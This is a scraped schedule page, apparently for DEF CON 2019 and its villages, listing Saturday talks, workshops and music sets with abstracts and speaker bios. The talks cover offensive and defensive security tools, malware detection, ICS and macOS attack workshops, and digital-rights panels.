Mapping of network assets and their behaviors is a vital step needed for the prevention and response to cyber-attacks. Today active tools like NMAP are used to discover network assets, however, these methods take a momentary snapshot of network devices. By passively monitoring network activity the discovery of rogue devices, aberrant behavior, and emerging threats is possible. This talk and demonstration will utilize a Raspberry Pi and a custom Python solution to map network assets and their behaviors and demonstration the identification of rogue devices and unauthorized behaviors.

Chet Hosmer (Twitter: @chethosmer) is an international author, educator & researcher, and founder of Python Forensics, Inc., a non-profit research institute focused on the collaborative development of open source investigative technologies using the Python programming language. Chet is also a Visiting Professor at Utica College in the Cybersecurity Graduate Program, where his research and teaching is focused on data hiding, active cyber defense and security of industrial control systems. Additionally, Chet is an Adjunct Professor at Champlain College in the Digital Forensics Graduate Program, where his research and teaching is focused on solving hard digital investigation problems using the Python programming language.


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 17:30-18:15


5:30 PM: Liven Up: Augmenting Materials for Bio-Hybrid Functionality
Speaker: Rachel Smith

Abstract: What tools are currently available to us to create living or bio-hybrid materialsthose that can be animated with biological functionalities for growth, response, distributed information processing, and cuing to the physical and chemical environment (a.k.a. the IOT before the digital IOT)? We seek fascinating ways augment the existing devices (i.e. pregnancy tests), 3D printed objects, and fabrics to interface with engineered living systems. The illustrated applications of these bio-hybrids range from disease-detection, programmable patterning of chemicals or pharmaceutics, and embedded reactivity to environmental DNA or particles.

Speaker Bio: PhD.c in the Mediated Matter Group at the MIT Media Lab, Rachel hunts for ways to augment existing synthetic materials and devices with biological or living functions. Rachel holds a B.S. in Biomedical Eng (UVA) and has a colorful past starting up high-accessibility diagnostic tools and running medical hackathons to encourage creative designs for hospital needs.

Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 3 - Saturday - 12:00 - 13:50


Local Sheriff

Saturday from 12:00 – 13:50 in Sunset 3 at Planet Hollywood
Audience: AppSec, Code Assesments, and privacy researchers

Konark Modi

URL is the most commonly tracked piece of information, the innocent choice to structure a URL based on page content can make it easier to learn a users’ browsing history, address, health information or more sensitive details. While you as a user normally browse the internet Local Sheriff works in the background and helps you identify what sensitive information(PII—Name, Date Of Birth, Email, Passwords, Passport number, Auth tokens.) is being shared/leaked to which all third-parties and by which all websites. The issues that Local Sheriff helps identify:

- What sensitive information is being shared with whom?
- Which companies are own these third parties?
- What can they doing with this information? EG: de-anonymize users on the internet, create shadow profiles.
- Data points that can be used for tracking a user across the web.
- Insights into which companies know what about you on the internet.

Local Sheriff can also be used by organizations to audit:

- Which all the third-parties that are being used on their websites.
- The third-parties on the websites are implemented in a way that respect user’s privacy and sensitive data is not being leaked to them.

Local Sheriff is a browser extension that can used with Chrome, Opera, Firefox, Brave, Cliqz.

https://github.com/cliqz-oss/local-sheriff/tree/master/scripts

Konark Modi
Konark works as a Tech lead with Cliqz GmbH developing privacy-focused search engine and browser. He works on projects ranging across Privacy by design, Anonymous Data collection like Human Web, Anti-Tracking etc. Prior to Cliqz, Konark was working with one of the largest e-commerce website in India(Makemytrip.com) in data platform and security team, solving interesting challenges related to DWH, BI and data security. His recent personal projects, in an endeavor to help organizations fix vulnerabilities have spanned across browsers, health trackers, Government services, travel mobile apps etc.


Return to Index    -    Add to    -    ics Calendar file

 

BCV - Flamingo 3rd Floor - Laughlin III Room - Saturday - 13:40-14:05


Low-Hanging Fruits in Blockchain Security

No description available


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 13:05-15:10


WORKSHOP

Manhunting 101 - OSINT Crash Course vs Human Targets

1305 - 1510


Return to Index    -    Add to    -    ics Calendar file

 

DC - Planet Hollywood - Firesides Lounge - Saturday - 20:00-21:59


Meet the EFF - Meetup Panel

Saturday at 20:00 in Firesides Lounge
120 minutes

Kurt Opsahl Deputy Executive Director And General Counsel, EFF

Camille Fischer Frank Stanton Fellow, EFF

Bennett Cyphers Staff Technologist, EFF

Nathan 'nash' Sheard Grassroots Advocacy Organizer, EFF

Shahid Buttar Panel Host and Director of Grassroots Advocacy, EFF

Join staffers at the Electronic Frontier Foundation—the nation's premier digital civil liberties group fighting for freedom and privacy in the computer age—for a candid chat about how the law is racing to catch up with technological change.

Then meet representatives from Electronic Frontier Alliance allied community and campus organizations from across the country. These technologists and advocates are working within their communities to educate and empower their neighbors in the fight for data privacy and digital rights.

This discussion will include updates on current EFF issues such as the government's effort to undermine encryption (and add backdoors), the fight for network neutrality, discussion of our technology projects to spread encryption across the Web and emails, updates on cases and legislation affecting security research, and much more.

Half the session will be given over to question-and-answer, so it's your chance to ask EFF questions about the law, surveillance and technology issues that are important to you.

Kurt Opsahl
Kurt Opsahl is the Deputy Executive Director and General Counsel of the Electronic Frontier Foundation. In addition to representing clients on civil liberties, free speech and privacy law, Opsahl counsels on EFF projects and initiatives. Opsahl is the lead attorney on the Coders' Rights Project, and is representing several companies who are challenging National Security Letters. Before joining EFF, Opsahl worked at Perkins Coie, where he represented technology clients with respect to intellectual property, privacy, defamation, and other online liability matters, including working on Kelly v. Arribasoft, MGM v. Groksterand CoStar v. LoopNet. For his work responding to government subpoenas, Opsahl is proud to have been called a "rabid dog" by the Department of Justice. Prior to Perkins, Opsahl was a research fellow to Professor Pamela Samuelson at the U.C. Berkeley School of Information Management & Systems. Opsahl received his law degree from Boalt Hall, and undergraduate degree from U.C. Santa Cruz. Opsahl co-authored "Electronic Media and Privacy Law Handbook." In 2007, Opsahl was named as one of the "Attorneys of the Year" by California Lawyer magazine for his work on the O'Grady v. Superior Courtappeal. In 2014, Opsahl was elected to the USENIX Board of Directors.

Camille Fischer
Camille Fischer is a Frank Stanton Fellow working on EFF’s free speech and government transparency projects. Camille came to EFF from D.C. where she worked in the Obama White House and in the Department of Commerce advocating for civil, human rights, and due process protections in national security and law enforcement policies. She also ran projects to increase consumer security and privacy, like the move to chip cards (sorry not sorry), and has war stories about ECPA Reform, MLATs, and encryption. Camille graduated from Georgetown University Law Center and the University of Georgia (Go Dawgs). She takes pics and bakes pies.

Bennett Cyphers
Bennett is an engineer on the Tech Projects team, where he works on Privacy Badger and HTTPS Everywhere.

Before EFF, Bennett was at Access Now and MIT, and he has a Master's of Engineering for work on privacy-preserving machine learning. He cares about privacy, transparency, data ownership, and digital equity. He wishes ad companies would kindly stop tracking everyone. Outside of work he has hobbies and likes fun.

Nathan 'nash' Sheard
As EFF's Grassroots Advocacy Organizer, nash works directly with community members and organizations to take advantage of the full range of tools provided by access to tech, while engaging in empowering action toward the maintenance of digital privacy and information security.

Shahid Buttar
Shahid leads EFF's grassroots, student, and community outreach efforts. He's a constitutional lawyer focused on the intersection of community organizing and policy reform as a lever to shift legal norms, with roots in communities across the country resisting mass surveillance. From 2009 to 2015, he led the Bill of Rights Defense Committee as Executive Director.

Outside of his work at EFF, Shahid also DJs and produces electronic music, writes poetry & prose, kicks rhymes, organizes guerilla poetry insurgencies, plays capoeira, speaks truth to power on Truthout, occasionally elucidates legal scholarship, and documents counter-cultural activism for the Burning Man Journal. He also serves on the Boards of Directors of Defending Rights and Dissent, the Center for Media Justice, and the Fund for Constitutional Government.


Return to Index    -    Add to    -    ics Calendar file

 

BTVT - Flamingo - 3rd Floor- Savoy Room - Saturday - 15:00-15:30


Memhunter - Automated Hunting Of Memory Resident Malware At Scale

Saturday 15:00, Savoy Ballroom, Flamingo (Blue Team Village) (30M)

@marcosd4h is an experienced, self-motivated, and results-driven software architect who loves to program not only to create code but to create value. He has had extensive experience with heterogeneous technologies and computer architectures. Over his years of professional work experience, computer security has long been his passion - whether it has been around designing exploit prevention capabilities of an endpoint security solution, or doing vulnerability research on carrier-grade telco charging software, or analyzing an exploit/malware to create a detection signature, or just participating on CTFs for fun. Marcos is currently working at McAfee as a Software Architect, leading the development of the exploit-prevention technology components which are part of the company's next-generation flagship product called Endpoint Security (ENS). This product is currently deployed over millions of endpoints worldwide. Marcos also led the organization of the first-ever BSides conference in Cordoba, Argentina.

@chgaray is an experienced infosec analyst who drives strategic initiatives and provides thought leadership and insights regarding the ever-changing global threat landscape at Claro America Movil offices in South America. He organized the 1hackparaloschicos local security conferences in the past, and now he is working on the organization of the first-ever BSides conference in Cordoba, Argentina.

Memhunter is an endpoint sensor tool specialized in detecting memory-resident malware. The detection process is performed through a combination of endpoint data collection and memory inspection scanners. Memhunter automates the detection of memory resident malware at scale. The tool is a standalone binary that, upon execution, deploys itself as a windows service. Once running as a service, memhunter starts the collection of ETW events that might indicate code injection attacks. The live stream of collected data events is feed into memory inspection scanners that use detection heuristics to down select the potential attacks to the one that represents actual fileless threats. The entire detection process does not require human intervention, neither memory dumps, and it can be performed by the tool itself, at scale, improving the threat hunting analysis process and remediation times.


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 6 - Saturday - 10:00 - 11:50


Memhunter - Automated hunting of memory resident malware at scale

Saturday from 10:00 – 11:50 in Sunset 6 at Planet Hollywood
Audience: Defense

Marcos Oviedo

Memhunter is an endpoint sensor tool specialized in detecting memory-resident malware. The detection process is performed through a combination of endpoint data collection and memory inspection scanners. The tool is a standalone binary that, upon execution, deploys itself as a windows service. Once running as a service, memhunter starts the collection of ETW events that might indicate code injection attacks. The live stream of collected data events is feed into memory inspection scanners that use detection heuristics to down select the potential attacks. The entire detection process does not require human intervention, neither memory dumps, and it can be performed by the tool itself, at scale, improving the threat hunting analysis process and remediation times. The tool was designed as a replacement of memory forensic mechanisms such as volatility malfind and hollowfind plugins, which requires human analysis and memory dumps to find suspicious artifacts on memory. Besides the data collection and hunting heuristics, the project has also led to the creation of a companion tool called minjector that contains +20 code injection techniques. The minjector tool can be used to exercise memhunter detections, and as a one-stop learning solution on well-known code injection techniques out there.

https://github.com/marcosd4h/memhunter

Marcos Oviedo
Marcos Oviedo is an experienced, self-motivated, and results-driven software architect who loves to develop software not only to create code but to create value. He has had extensive experience with heterogeneous technologies and computer architectures. Over his years of professional work experience, computer security has long been his passion—whether it has been around designing exploit prevention capabilities of an endpoint security solution, or doing vulnerability research on carrier-grade telco charging software, or just participating on CTFs for fun. Marcos is currently working as an Endpoint Software Architect at McAfee. Marcos also organized the first-ever BSides conference in Cordoba, Argentina.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 11:00-11:45


Meticulously Modern Mobile Manipulations

Saturday at 11:00 in Track 4
45 minutes | Demo

Leon Jacobs Researcher - SensePost

Mobile app hacking peaked in 2015 with tools like keychain-dumper & ssl-kill-switch released but requiring jailbroken/rooted devices. Back then, wresting the power to understand & modify apps on our devices from dystopian looking mega corps was our cause. As jailbreaks became infrequent, the hackers’ arsenal was left behind. While this is progress against dark uses of hacking, done to protect our freedom fighters, how can hackers still hold power to account? Can we still find flaws in apps/devices & live up to the protections the technology promises?

Enter runtime binary instrumentation with Frida. It’s possible to analyze apps in their final state when executed on real hardware running the latest iOS/Android with no jailbreaks. This fills a gap between source analysis & debuggers. But, simply enumerating app classes requires studying multiple blogs & a deep read of the docs. We created Objection to simplify this & hide the boilerplate so hackers could focus on unravelling apps. But, many people still rely on simple hacks & automation & rarely use new advanced techniques such as reflectively inspecting live heap objects, canary execution tracing, runtime memory edits and filesystem exploration.

We’ll show hackers, malware researchers & security engineers how to use these advanced mobile hacking techniques.

Leon Jacobs
Leon has been hacking for over a decade. He’s plied his trade at SensePost for the last three having previously worked for a bank and ISP in South Africa. Leon spends most of his daytime hours hacking large networks or web and mobile applications. Leon spends most of his nighttime hours building hacking tools and techniques to contribute back to the community.

Twitter: @leonjza


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead I - Saturday - 10:00-13:59


Mind the Gap Between Attacking Windows and Mac: Breaking In and Out of Protected MacOS environments

Saturday, 1000-1400 in Flamingo, Lake Mead I

Richard Gold Hacker

MacOS has a strong reputation for security and comes with many restrictions such as the usage of an App Store to prevent malicious code being installed. However, we have found that since MacOS is the minority platform for many software packages and security platforms, it rarely gets the same attention from security vendors as Windows. This workshop will teach you to exploit that lack of attention from software like Microsoft Office and security platforms like a leading EDR solution to break in and out of a MacOS estate. The principles also apply to other *nix environments like Linux.

We will walk you through how to use open source tools, both unmodified and customized, can be used to take advantage of the difference in capability, e.g., script detection, between Windows and non-Windows platforms. We will show you how to map out an environment, how to gain code execution in multiple ways, grab credentials, find files, collect screenshots and webcam shots and exfiltrate the loot while remaining undetected.

The key takeaway is that despite the myriad of operating system security features present in MacOS and Linux, and the addition of EDR, protected MacOS or Linux environments can still be compromised by a diligent attacker using open source tooling. This workshop will show you how!

[Unfortunately we cannot provide an EDR system for you to play with, so please bring your own or practice the techniques without that particular opponent.]

Skill Level Intermediate

Prerequisites: Intermediate command line skills with *nix-style environments like MacOS or Linux

Materials: Their own MacOS laptop. Preferably with an EDR solution in place, but the principals will still be valid without one. Microsoft Office is strongly recommended for the client-side attacks.

Max students: 40

Registration: https://www.eventbrite.com/e/mind-the-gap-between-attacking-windows-and-mac-breaking-in-and-out-of-protected-macos-environments-tickets-63608046379
(Opens 8-Jul-19)

Richard Gold
Richard Gold is a hands-on information security professional, who has over a decade's worth of experience in understanding and securing computer networks. With his background as a Certified SCADA Security Architect and a Ph.D. in Computer Networking, Richard uses knowledge he's gained from breaking into systems to better detect and protect networks, as well as build custom tooling. He regularly speaks on these topics at industry events, universities, and in the media.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Lake Mead II - Saturday - 14:30-18:30


Modern Debugging^HWarfare with WinDbg Preview

Saturday, 1430-1830 in Flamingo, Lake Mead II

Chris Alladoum Security Researcher, Sophos Labs

Axel Souchet Hacker

It's 2019 and yet too many Windows developers and hackers alike rely on (useful but rather) old school tools for debugging Windows binaries (OllyDbg, Immunity Debugger). What they don't realize is that they are missing out on invaluable tools and functionalities that come with Microsoft newest WinDbg Preview edition. This hands-on workshop will attempt to level the field, by practically showing how WinDbg has changed to a point where it should be the first tool to be installed on any Windows (10) for binary analysis machine: after a brief intro to the most basic (legacy) commands, this workshop will focus around debugging modern software (vulnerability exploitation, malware reversing, DKOM-based rootkit, JS engine) using modern techniques provided by WinDbg Preview (spoiler alert to name a few, JavaScript, LINQ, TTD). By the end of this workshop, trainees will have their WinDbg-fu skilled up.

Skill Level Intermediate

Prerequisites: familiarity with Windows platform and kernel debugging
basic knowledge of debuggers (pref. WinDbg)
basic knowledge of JavaScript

Materials: Any modern laptop with at least one Windows 10 VM guest (pref. 2 for kdnet remote debugging, but can work out with lkd). Also need Internet access.

Max students: 20

Registration: https://www.eventbrite.com/e/modern-debugginghwarfare-with-windbg-preview-lake-mead-ii-tickets-63998510267
(Opens 8-Jul-19)

Chris Alladoum
Chris is a security researcher and part of the Offensive Security team at Sophos Labs in Vancouver, Canada. His focus are around reverse-engineering and exploitation, Windows and Linux OS internals, writing code and CTFs.

Axel Souchet
Axel is a computer and security enthusiast _.


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 16:00-17:59


Speaker: Andrew Krug

Twitter: @andrewkrug

In this workshop, you learn about open-source projects and how they can support your security detection and response in the cloud. Learn how open-source technologies can help you assess and deal with incidents in your environment. Look at automated response, and learn how to respond to and remediate issues in your cloud environment using open-source systems, specifically Mozilla MozDef : Enterprise Defense Platform.

About Andrew: Andrew Krug is the founder of open source project ThreatResponse which includes popular tools like AWS_IR and MargaritaShotgun. Krug works as a Staff Security Engineer at Mozilla focused on Identity and Access Management and Cloud Security. Previously Krug has been a re: Invent, re: Inforce, BlackHat, BSides PDX speaker, and more.


Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 24:00-24:59


Title:
Music - Acid-T A.K.A. DJ SmOke

No description available
Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 25:00-25:59


Title:
Music - Clockwork Echo

No description available
Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 22:00-22:59


Title:
Music - Icetre Normal

No description available
Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 21:00-21:59


Title:
Music - Kampf

No description available
Return to Index    -    Add to    -    ics Calendar file

 

Night Life - Planet Hollywood - Gallery Nightclub - Saturday - 23:00-23:59


Title:
Music - Scotchandbubbles

No description available
Return to Index    -    Add to    -    ics Calendar file

 

ETV - Flamingo - 3rd Floor - Reno II Room - Saturday - 16:00-16:59


Title:
National Collegiate Penetration Testing Competition & Ethical Challenges


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 4 - Saturday - 14:00-14:45


Next Generation Process Emulation with Binee

Saturday at 14:00 in Track 4
45 minutes | Demo, Tool

Kyle Gwinnup Senior Threat Researcher, Carbon Black

John Holowczak Threat Researcher

The capability to emulate x86 and other architectures has been around for some time. Malware analysts have several tools readily available in the public domain. However, most of the tools stop short of full emulation, halting or doing strange things when emulating library functions or system calls not implemented in the emulator. In this talk we introduce a new tool into the public domain, Binee, a Windows Process emulator. Binee creates a nearly identical Windows process memory model inside the emulator, including all dynamically loaded libraries and other Windows process structures. Binee mimics much of the OS kernel and outputs a detailed description of all function calls with human readable parameters through the duration of the process. We've designed Binee with two primary use cases in mind; data extraction at scale with a cost and speed similar to common static analysis tools, and second, for malware analysts that need a custom operating system and framework without the overhead of spinning up various configurations of virtual machines. Currently Binee can run on Windows, OS X, and Linux.

Kyle Gwinnup
Kyle is a Senior Threat Researcher in Carbon Black's TAU team. He has over 10 years of experience in many areas of computer science and IT. Prior to Carbon Black, Kyle worked in finance and with the DoD in various roles ranging from network/systems administrator, software engineer, reverse engineer, penetration tester and offensive tool developer. At Carbon Black, Kyle's focus is on large scale program analysis, primarily static but moving asymptotically toward dynamic analysis.

Twitter: @switchp0rt

John Holowczak
John is a Threat Researcher on Carbon Black's Threat Analysis Unit, focusing on automation of threat detection and building out infrastructure for large scale malware analysis. Within the field of threat detection and analysis, John specializes his research in binary classification, dynamic analysis and reverse engineering.

Twitter: @skipwich


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 2 - Saturday - 16:00-17:45


NOC NOC. Who's there? All. All who? All the things you wanted to know about the DEF CON NOC and we won't tell you about

Saturday at 16:00 in Track 2
105 minutes

The DEF CON NOC

It's been a while, something like DEF CON 19, since we had the chance to have more than a few minutes at closing ceremonies to talk to everyone about the DEF CON NOC. It is not uncommon for people during the show or throughout the year to come to us asking things here and there about the DEF CON network. Come see all the DEF CON NOC team on stage, yes, those you usually don't see anywhere during the show, because, well, we're making sure packets are flowing and people are interneting. Come learn what we do, how we do it and possibly answer any questions that you might have about the "most hostile network in the planet".

The DEF CON NOC
@DEFCON_NOC, @effffn, @macmceniry, @Mike_Moore, @mansimusa, @c7five, @_CRV, @jaredbird, all the other NOC members who refuse to share their twitter handles and our very special guest Lord Raytheon


Return to Index    -    Add to    -    ics Calendar file

 

BHV - Planet Hollywood - Melrose 1-3 Rooms - Saturday - 10:00-10:15


10:00 AM: Opening Words
Welcome to the Biohacking Village!

Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 2 - Saturday - 14:00 - 15:50


OWASP Amass

Saturday from 14:00 – 15:50 in Sunset 2 at Planet Hollywood
Audience: Red Team, Blue Team, Bug Bounty Hunters, Penetration Testers

Jeff Foley & Anthony Rhodes

Today, organizations deal with the challenge of running their infrastructure across many networks and namespaces due to the use of cloud and hosting services, legacy environments and acquisitions. This can make it difficult for an organization to maintain visibility of its Internet-facing assets and an ability to track down systems that pose a risk to its security posture. The OWASP Amass Project has developed a tool to help information security professionals perform network mapping of attack surfaces and perform external asset discovery. During this talk, contributors to the project will discuss how OWASP Amass uses OSINT, network reconnaissance, graph databases and information sharing to provide both attackers and defenders better visibility of target organizations. Presenters will be providing an in-depth tour of all OWASP Amass features with tips and tricks shown along the way.

https://github.com/OWASP/Amass

Jeff Foley
Jeff Foley is the Founder and Project Leader of OWASP Amass. Jeff has spent nearly twenty years as an innovative technologist taking on challenges in the area of cyber warfare. He started the Amass project after noticing the need for practical OSINT tools that aid information security professionals in mapping complex networks.

Anthony Rhodes
Anthony Rhodes has over five years of industry experience as a penetration tester, red teamer, and software engineer. He has been following the OWASP Amass Project since its inception and has recently joined as a contributor to help enrich its functionality beyond DNS enumeration and network mapping.


Return to Index    -    Add to    -    ics Calendar file

 

CLV - Flamingo 3rd Floor - Reno I Room - Saturday - 11:45-12:15


Speaker: Setu Parimi

Twitter: NA

Abstract: Policy as Code Bot (PacBot) is a platform for continuous compliance monitoring, compliance reporting and security automation for the cloud. In PacBot, security and compliance policies are implemented as code. All resources discovered by PacBot are evaluated against these policies to gauge policy conformance. The PacBot auto-fix framework provides the ability to automatically respond to policy violations by taking predefined actions.

PacBot packs in powerful visualization features, giving a simplified view of compliance and making it easy to analyze and remediate policy violations. PacBot is more than a tool to manage cloud misconfiguration, it is a generic platform that can be used to do continuous compliance monitoring and reporting for any domain.

About Setu: Cloud Security Architect with specialization towards defense in depth and incident response in cloud.


Return to Index    -    Add to    -    ics Calendar file

 

AVV - Bally's Event Center - Saturday - 10:00-10:59


Panel – The Long Haul: The State of Aviation Security Policy

Synopsis

  • Andrea (@amatwyshyn and @PSUPILOTlab), the moderator, will provide an introduction to the law of air safety regulation using the case study of the Boeing 737 MAX.
  • Stefan will discuss the state of aircraft avionics vulnerabilities, comparing and contrasting with other industries.
  • Pete will offer a pilot’s perspective, explaining how aviation prevents critical safety or security incidents through a layering of people, process and technology.
  • RenderMan will update his DEFCON talk on air traffic spoofing, sharing what happened after his talk in terms of policy respons

About Our Panel

Andrea is a professor at Penn State in the law school and engineering school and the founding director of the PSU PILOT lab.
https://www.andreamm.com/


Stefan is a professor in the Department of Computer Science and Engineering at University of California, San Diego. https://cseweb.ucsd.edu/~savage/


Pete is a former fast jet pilot and Flight Safety Officer and an independent cyber security adviser based in London. https://www.atlanticcouncil.org/about/experts/list/pete-cooper

RenderMan is security enthusiast with a focus on security threats of all sorts. He is the founder/chief researcher of the Internet of Dongs project. https://ca.linkedin.com/in/brad-haines-renderman-2bb4638


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 4 - Saturday - 12:00 - 13:50


PCILeech and MemProcFS

Saturday from 12:00 – 13:50 in Sunset 4 at Planet Hollywood
Audience: Offense, Defense, Forensics, Hardware

Ulf Frisk & Ian Vitek

PCILeech and MemProcFS: The PCILeech direct memory access attack toolkit was presented at DEF CON 24 and quickly became popular amongst red teamers, governments and game cheaters alike. We will demonstrate how to take total control of still vulnerable systems with PCIe DMA code injection using affordable FPGA hardware and the open source PCILeech direct memory access attack toolkit. MemProcFS - The Memory Process File System is memory forensics and analysis made super easy! Analyze memory by clicking on files in a virtual file system or by using the C and Python API. A wide range of memory acquisition methods are supported. Analyze memory dump files by point and click, analyze live memory acquired using PCILeech PCIe FPGA hardware devices or even live memory acquired in real time from remote hosts over the network. Zero-cost open source memory forensics and incident response?

https://github.com/ufrisk/pcileech https://github.com/ufrisk/MemProcFS

Ulf Frisk
Ulf is a pentester by day, and a Security Researcher by night. Ulf is the author of the PCILeech direct memory access attack toolkit and the Memory Process File System. Ulf has previously presented his work at DEF CON, the Chaos Communication Congress and BlueHatIL. Ulf is interested in things low-level and primarily focuses on Memory Analysis and Direct Memory Access.

Ian Vitek
Ian Vitek has a background as a pentester but now works with information security in the Swedish financial sector. Ian has held several presentations at DEF CON, BSidesLV and other IT security conferences. The last years also performed as a DJ (VJ Q.Alba) at DEF CON and related private parties. Interested in web, layer 2, DMA and local pin bypass attacks.


Return to Index    -    Add to    -    ics Calendar file

 

Workshops - ( Sold Out ) - Flamingo - Lower Level - Valley of Fire II - Saturday - 14:30-18:30


Pentesting ICS 102

Saturday, 1430-1830 in Flamingo, Valley of Fire II

Alexandrine Torrents Consultant, Wavestone

Arnaud Soullié Manager, Wavestone

ICS cybersecurity has been a new subject for years now, especially since Stuxnet. Has the security level of ICS improved?

Well, even if ICS are more and more interconnected, we can probably say yes for network segmentation, as well as patching. And it is mostly true for critical infrastructures that must comply with multiple laws around the world. But what about the most critical components such as PLCs?

In this workshop, you will learn how to attack PLCs, by attacking ICS protocols: a well-known legacy protocol, Modbus, as well as an open source protocol considered as the future of ICS communications, OPC-UA. And to do so, what could be better than giving you hands-on experience on real devices by hacking our model train?

We will start by defining industrial control systems and its main components, as well as explaining the key risks and vulnerabilities that affect them. We will then focus on their key assets, Programmable Logic Controllers (PLCs), and discover how they work, how they communicate, how they can be programmed to learn the methods and tools you can use to p*wn them.

Then we will move on to real-world by attacking real PLCs from two major manufacturers on a dedicated setup featuring robot arms and a model train! And to conclude, probably the most difficult, let's discuss how to secure ICS communications.

Skill Level Beginner

Prerequisites: A knowledge of penetration testing is a plus, but we try to make it work for newbies as well.

Materials: A computer with 4gb of RAM, 30GB disk space and Virtualbox. We will provide a Virtual Machine for attendees.

Max students: 40

Registration: https://www.eventbrite.com/e/pentesting-ics-102-valley-of-fire-ii-tickets-64797701670
(Opens 8-Jul-19)

Alexandrine Torrents
Alexandrine Torrents is a cybersecurity consultant at Wavestone, a French consulting company. She is specialized in penetration testing, and performed several security assessment on ICS. She worked on a few ICS models to demonstrate attacks on PLCs and she developed a particular tool to request Siemens PLCs. Moreover, she is also working at securing ICS, in the scope of the French military law, enforcing companies offering a vital service to the nation to comply to security rules.

Arnaud Soullié
Arnaud Soullié is a manager at Wavestone, performing security audits and leading R&D projects. He has a specific interest in Active Directory security as well as ICS, two subjects that tend to collide nowadays. He teaches ICS security and pentests workshops at security conferences (BlackHat Europe 2014, BSides Las Vegas 2015/2016, Brucon 2015/2017, DEFCON 24, DEFCON 26) as well as full trainings (Hack In Paris 2015 and 2018, BlackHat Asia 2019).


Return to Index    -    Add to    -    ics Calendar file

 

PHVT - Bally's - Indigo Tower - 26th Floor - Saturday - 13:00-13:59


Phishing Freakonomics

Russell Butturini

This presentation is the story of the success and failures of building a security awareness program at a Top 20 CPA firm, and finding "the hidden side" of why users fail phishing exercises (both simulated and not!). The presentation will cover how Elasticsearch was used to correlate awareness training, phishing test, and HR data together, examine real results from this work, and the improvements that were made to improve user awareness and reduce phishing related security incidents.

Russell Butturini (Twitter: @tcstoolhax0r) is head of information security for a top 20 CPA and financial services firm. He has authored tools for both red and blue teams with his C- and Python coding skills. His most popular tool, NoSQLMap, was featured in the Hacker Playbook 2.


Return to Index    -    Add to    -    ics Calendar file

 

RCV - Planet Hollywood - Celebrity 5 Ballroom - Saturday - 16:15-16:59


LIVE TOOL DEMO

PIE - A hardware based Prebellico Intelligence Exfiltration Botnet

1615 - 1700


Return to Index    -    Add to    -    ics Calendar file

 

DL - Planet Hollywood - Sunset 3 - Saturday - 14:00 - 15:50


PivotSuite: Hack The Hidden Network - A Network Pivoting Toolkit

Saturday from 14:00 – 15:50 in Sunset 3 at Planet Hollywood
Audience: Offense (Red Teamers / Penetration Testers)

Manish Gupta

PivotSuite is a portable, platform independent and powerful network pivoting toolkit, Which helps Red Teamers / Penetration Testers to use a compromised system to move around inside a network. It is a Standalone Utility, Which can use as a Server or as a Client. PivotSuite as a Server : If the compromised host is directly accessible (Forward Connection) from Our pentest machine, Then we can run pivotsuite as a server on compromised machine and access the different subnet hosts from our pentest machine, Which was only accessible from compromised machine. PivotSuite as a Client : If the compromised host is behind a Firewall / NAT and isn't directly accessible from our pentest machine, Then we can run pivotsuite as a server on pentest machine and pivotsuite as a client on compromised machine for creating a reverse tunnel (Reverse Connection). Using this we can reach different subnet hosts from our pentest machine, which was only accessible from compromised machine.

https://github.com/RedTeamOperations/PivotSuite

Manish Gupta
Manish Gupta is a Cyber Security Analyst at Societe Generale in India. Where he specializes in Offensive Security and Red Teaming Activities on Banking Environment. A part-time Bug Bounty Hunter and CTF Player. His Research interest includes Real World Cyber Attack Simulation and Advanced persistent Threat (APT). He currently working on developing Open-Source Offensive Security Toolkit which helps Red Teamers / Penetration Testers.


Return to Index    -    Add to    -    ics Calendar file

 

DC - Paris - Track 1 - Saturday - 13:00-13:45


RACE - Minimal Rights and ACE for Active Directory Dominance

Saturday at 13:00 in Track 1
45 minutes | Demo, Tool

Nikhil Mittal PentesterAcademy

User rights and privileges are a part of the access control model in Active Directory. Applicable only at the local computer level, a user generally has different rights (through access tokens) on different machines in a domain. Another part of the access control model is security descriptors (ACLs) that protects a securable object. At the domain level, ACL abuse is well known and adversaries have used it for persistence. For user rights, the abuse is mostly with the help of groups (memberships, SID History etc.) or misconfigured delegated rights.

A lesser-known area of abuse and offensive research is a combination of minimal Rights and ACE (hence the term RACE). Often overlooked in audits and assessments, using minimal rights along with favourable ACEs provides a very interesting technique of persistence and on-demand privilege escalation on a Windows machine with much desired stealth.

This talk covers interesting domain privilege escalation, persistence and backdoor techniques with the help of ACLs, minimal user rights and combinations of both. We will discuss how these techniques can be applied using open source tools and scripts. The talk also covers how to detect and mitigate such attacks. The talk will be full of live demonstrations.

Nikhil Mittal
Nikhil Mittal is a hacker, infosec researcher, speaker and enthusiast. His area of interest includes red teaming, active directory security, attack research, defense strategies and post exploitation research. He has 10+ years of experience in red teaming. He specializes in assessing security risks at secure environments that require novel attack vectors and "out of the box" approach. He has worked extensively on Active Directory attacks, defense and bypassing detection mechanisms and Offensive PowerShell for red teaming. He is creator of multiple tools like Nishang, a post exploitation framework in PowerShell and Deploy-Deception a framework for deploying Active Directory deception. In his spare time, Nikhil researches on new attack methodologies and updates his tools and frameworks.

